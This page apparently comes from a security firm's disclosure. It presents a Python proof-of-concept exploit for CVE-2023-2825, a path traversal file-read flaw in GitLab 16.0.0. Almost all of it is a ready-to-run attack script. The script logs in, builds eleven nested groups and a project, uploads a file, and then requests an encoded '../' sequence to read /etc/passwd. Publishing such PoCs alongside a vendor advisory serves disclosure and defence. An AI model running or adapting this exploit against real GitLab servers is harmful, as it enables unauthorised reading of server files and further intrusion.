Exploit for CVE-2023-2825
An analysis and exploit for CVE-2023-2825, a critical vulnerability in Gitlab community and enterprise editions.
occamsec.com
PoC
Python:
# CVE-2023-2825 - GitLab Unauthenticated arbitrary file read
# Released by OccamSec on 2023.05.25
#
# OccamSec Blog: https://occamsec.com/exploit-for-cve-2023-2825/
# Vendor advisory: https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
#
# This Proof Of Concept leverages a path traversal vulnerability
# to retrieve the /etc/passwd file from a system running GitLab 16.0.0.
#
import requests
import random
import string
from bs4 import BeautifulSoup
ENDPOINT = "https://gitlab.example.com"
USERNAME = "root"
PASSWORD = "toor"
# Session for cookies
session = requests.Session()
# CSRF token
csrf_token = ""
def request(method, path, data=None, files=None, headers=None):
global session
global csrf_token
if method == "POST" and isinstance(data, dict):
data["authenticity_token"] = csrf_token
response = session.request(
method, f"{ENDPOINT}{path}", data=data, files=files, headers=headers
)
if response.status_code != 200:
print(response.text)
print(f"[*] Request failed: {method} - {path} => {response.status_code}")
exit(1)
if response.headers["content-type"].startswith("text/html"):
csrf_token = BeautifulSoup(response.text, "html.parser").find(
"meta", {"name": "csrf-token"}
)["content"]
return response
# Get initial CSRF token
request("GET", "")
# Login
print("[*] Attempting to login...")
request(
"POST",
"/users/sign_in",
data={"user[login]": USERNAME, "user[password]": PASSWORD},
)
# csrf_token = get_csrf_token(login_resp.text)
print(f"[*] Login successful as user '{USERNAME}'")
# Create groups
group_prefix = "".join(random.choices(string.ascii_uppercase + string.digits, k=3))
print(f"[*] Creating 11 groups with prefix {group_prefix}")
parent_id = ""
parent_prefix = ""
for i in range(1, 12):
# Create group
name = f"{group_prefix}-{i}"
request(
"POST",
"/groups",
data={
"group[parent_id]": parent_id,
"group[name]": name,
"group[path]": name,
"group[visibility_level]": 20,
},
)
# Get group id
resp = request("GET", f"/{parent_prefix}{name}")
parent_id = BeautifulSoup(resp.text, "html.parser").find(
"button", {"title": "Copy group ID"}
)["data-clipboard-text"]
# Build parent prefix
parent_prefix += f"{name}/"
print(f"[*] Created group '{name}'")
# Create project
request(
"POST",
"/projects",
data={
"project[ci_cd_only]": "false",
"project[name]": "CVE-2023-2825",
"project[selected_namespace_id]": parent_id,
"project[namespace_id]": parent_id,
"project[path]": "CVE-2023-2825",
"project[visibility_level]": 20,
"project[initialize_with_readme": 1,
},
)
repo_path = f"{parent_prefix}/CVE-2023-2825"
print(f"[*] Created public repo '{repo_path}'")
# Upload file
file_resp = request(
"POST",
f"/{repo_path}/uploads",
files={"file": "hello world"},
headers={"X-CSRF-Token": csrf_token},
)
file_url = file_resp.json()["link"]["url"]
print(f"[*] Uploaded file '{file_url}'")
# Get /etc/passwd
exploit_path = f"/{repo_path}{file_url.split('file')[0]}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
print(f"[*] Executing exploit, fetching file '/etc/passwd': GET - {exploit_path}")
exploit_resp = request("GET", exploit_path)
print(f"\n{exploit_resp.text}")